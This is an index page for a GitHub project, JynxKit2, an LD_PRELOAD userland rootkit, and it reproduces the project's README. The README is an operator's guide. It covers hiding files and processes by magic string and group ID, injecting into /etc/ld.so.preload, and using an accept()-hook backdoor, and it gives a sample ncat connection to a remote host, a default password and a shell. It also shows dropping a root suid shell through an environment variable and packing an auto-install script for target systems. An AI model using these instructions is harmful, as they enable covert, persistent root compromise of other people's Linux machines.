Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/chokepoint/Jynx2
JynxKit2 is an LD_PRELOAD userland rootkit based on the original JynxKit. The backdoor has been replaced with an "accept()" system hook.
https://github.com/chokepoint/Jynx2
Last synced: 3 months ago
JSON representation
JynxKit2 is an LD_PRELOAD userland rootkit based on the original JynxKit. The backdoor has been replaced with an "accept()" system hook.
- Host: GitHub
- URL: https://github.com/chokepoint/Jynx2
- Owner: chokepoint
- Created: 2012-12-15T09:55:22.000Z (almost 12 years ago)
- Default Branch: master
- Last Pushed: 2012-12-15T09:57:08.000Z (almost 12 years ago)
- Last Synced: 2024-04-08T20:14:07.115Z (7 months ago)
- Language: C
- Size: 98.6 KB
- Stars: 147
- Watchers: 12
- Forks: 55
- Open Issues: 0
-
Metadata Files:
- Readme: README
Awesome Lists containing this project
README
_ _,.-.' .-.
_ .' |,' ."".| |.""._
( || ,',"". `._`' ` ' `.
`\ | `" .-"`-..` . `.
| `..--.._ | \
_,| _...'_.' ,+. `.
,""'| `...-'..""(__.._ -" `"--.. `.
|`._,' ,' /\ .'""` .'""`. `. | `. \
' / / / || || |.`.`. . | \
`.__,'-._' /|` -"' `-.' \ \ \ `"-' \
' `. / /_| | |'""| | .-""'`'"`-,.-"\ .
. / .\ . / | | `._.' || ,' \ \
' / / |/ /_.-+._`-..--"-. . . \ `
/ /.' ' ,'""'-. `"."'""'`.. |. \ \
/ . | j . . | |\__," |. ` ' \
. | | | | ' | '| | ' ` \ \ .
| | | `.____,' ..____,' | | . \
| | | | ._ _..---._ _,' | . '
| | | | | "" . |`"' \ `.| ' ' ' .
| | | | | | | ` ` . . \ |
| | | | | ' | \ `. | | . |
' ' | | | . ` \ \ | | | |
\ ` | | | . `. | | | |
\ \ ' | ` ' ` `+..|___|___|_........
\ \ \| ' . `. `. |
`. \ . . ` `. `-. .'
_,'`. \' . \ `-.._ `._ ,'
_." `._ `.` | . `._ .
`._ _,`"--`. | . `. |
`-._ ,' | `. `|_
,' | | `. `.
.' __...__.| | \ __..._ _,..,.__ `.
`-`"' `._..--'-.__ .' `-..' ``'"--..-'
`"---'
/$$$$$ /$$ /$$ /$$ /$$
|__ $$ | $$ /$$/|__/ | $$
| $$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ /$$/ /$$ /$$$$$$
| $$| $$ | $$| $$__ $$| $$ /$$//$$$$$$| $$$$$/ | $$|_ $$_/
/$$ | $$| $$ | $$| $$ \ $$ \ $$$$/|______/| $$ $$ | $$ | $$
| $$ | $$| $$ | $$| $$ | $$ >$$ $$ | $$\ $$ | $$ | $$ /$$
| $$$$$$/| $$$$$$$| $$ | $$ /$$/\ $$ | $$ \ $$| $$ | $$$$/
\______/ \____ $$|__/ |__/|__/ \__/ |__/ \__/|__/ \___/
/$$ | $$
| $$$$$$/
\______/
BlackHatAcademy.org
ErrProne / XO
File list: config.h jynx2.c reality.c Makefile packer.sh README
0x01. Setting up config.h.
First of all, you need to dig into config.h, and ensure that the settings meet your needs.
MAGIC_STRING should be changed to the name of the directory you want to hide from the system. This can
be used as a prefix to your main directory as well as for files. MAGIC_GID will be the Group ID to
hide as well. Make sure that you set MAGIC_DIR Group ID to MAGIC_GID for hiding purposes as well.
This will help disguise the processes from the system, including commands like ps. CONFIG_FILE
defaults to ld.so.preload, which is usually located in /etc. You shouldn't have to change this
unless you're going to dig a little deeper into hiding Jynx-Kit. MAGIC_ACK and MAGIC_SEQ have been
dropped in Jynx2, since the new backdoor hooks accept() system call, and still includes SSL support.
After installing Jynx2, ensure that you restart the daemon that you want to use as the backdoor.
0x02. The accept backdoor.
LOW_PORT and HIGH_PORT are the first of the two part new two factor authentication. The source
port of your connect client must fall between this port range, and since you have to be root in order
to use this port range, it ensures that no random connections will match this criteria. SHELL_PASSWORD
will be the password used for the second factor of authentication, and should be the first line sent to
the backdoor upon connecting. For instance say we have port 80 backdoored. Our client will connect like so.
Make sure you are using the ssl flag with ncat.
# sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia
214473 drwxr-xr-x 2 errprone users 176 Mar 7 19:19 .
177137 drwxr-xr-x 15 errprone users 952 Mar 5 22:15 ..
0x03. Drop a local suid shell.
A new feature is also being able to drop a local suid shell using ENV_VARIABLE set in config.h
To drop a shell, simply set the defined user variable, and make a call to a program with euid of 0.
For instance you can do the following.
# XxJynx=hahahax sudo
# whoami
root
0x04. Configuring Makefile and Installing.
Once you have this configured, go ahead and open up Makefile. Make sure that MAGIC_GID
matches what you have in config.h. INSTALL should be set to the directory that you want to hide
your files in. You can also set these variables upon calling "make install." See examples below.
# make all # compile jynx2.so
# make install # Installs jynx2, injects into ld preload, and sets correct GIDs
# make install INSTALL=/omgxochi MAGIC_GID=100
he last line installs the kit to /omgxochi, and sets the GID to 100. You should use GID
of 100 for anything that you're going to run, and need to hide from the system.
0x05. packer.sh
Now that you have everything configured and things compile correctly, you can use packer.sh
in order to create an auto install shell script for future installations. Simply remove the last 2 lines
from config.h, run packer.sh, and it will generate a new autokit.sh. ONLY RUN autokit.sh ON THE SYSTEM
YOU WANT TO INJECT.